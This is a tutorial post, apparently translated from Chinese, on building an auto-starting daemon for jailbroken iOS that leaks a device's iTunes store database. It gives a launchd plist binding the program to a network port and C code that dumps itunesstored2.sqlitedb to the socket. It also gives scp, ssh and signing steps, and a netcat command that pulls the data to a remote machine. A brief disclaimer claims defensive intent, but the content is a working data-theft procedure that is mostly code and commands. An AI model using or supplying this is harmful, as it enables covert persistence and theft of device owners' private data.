Background daemon illegally steals user information about itunesstore
I solemnly declare that I do not encourage the theft of user privacy and other behaviors. All hack learning is just to study how to defend. OK.
Auto-start
In IOS security defense (1): the Essential commands and tools for hack, this article describes how to compile your own C program and start it manually. Today, we will introduce how to enable the program to start automatically.
1. Open xcode to create a plist property file, as shown in:
Note that the communication service name is set to 55. Open it in the editor, that is:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Program</key><string>/usr/bin/ncdemo</string><key>StandardErrorPath</key><string>/dev/null</string><key>SessionCreate</key><true/><key>ProgramArguments</key><array><string>/usr/bin/ncdemo</string></array><key>inetdCompatibility</key><dict><key>Wait</key><false/></dict><key>Sockets</key><dict><key>Listeners</key><dict><key>SockServiceName</key><string>55</string></dict></dict></dict></plist>
Finally, SCP the plist file to the root@192.168.1.114:/system/library/launchdaemons.
Write the itunesstore database program
Read itunesstored2.sqlitedb information and output it to stdout for easy reading.
#include <stdio.h>#include <fcntl.h>#include <stdlib.h>#define FILE "/var/mobile/Library/com.apple.itunesstored/itunesstored2.sqlitedb"int main(){ int fd = open(FILE, O_RDONLY); char buf[128]; int ret = 0; if(fd < 0) return -1; while (( ret = read(fd, buf, sizeof(buf))) > 0){ write( fileno(stdout), buf, ret); } close(fd); return 0;}
Compile, copy, and sign
1. The compilation method has been clearly described in the previous article. We will not repeat it here ...... % # Generate ncdemo running on ARM
2. Connect the ncdemo SCP to the device and log on to the device.
$ SCP ncdemo root@192.168.1.114: ncdemo
$ SSH root@192.168.1.114.
3. Signature
# Ldid-s ncdemo
# Mv ncdemo/usr/bin
Capture itunesstore data information
In this case, we only need to use Netcat to specify the previously defined service name and easily capture information about the itunesstore device locally.
$ NC 192.168.1.114 55> itunesstored2.sqlitedb
Analyze itunesstore data information
Okay. Here we will introduce the simplest application, which can be viewed using the string command:
$ Strings itunesstored2.sqlitedb
Therefore, we can see which apps are installed on iPhone/iPad devices:
Of course, you can do whatever you want ...... It's late at night. Write it here first ......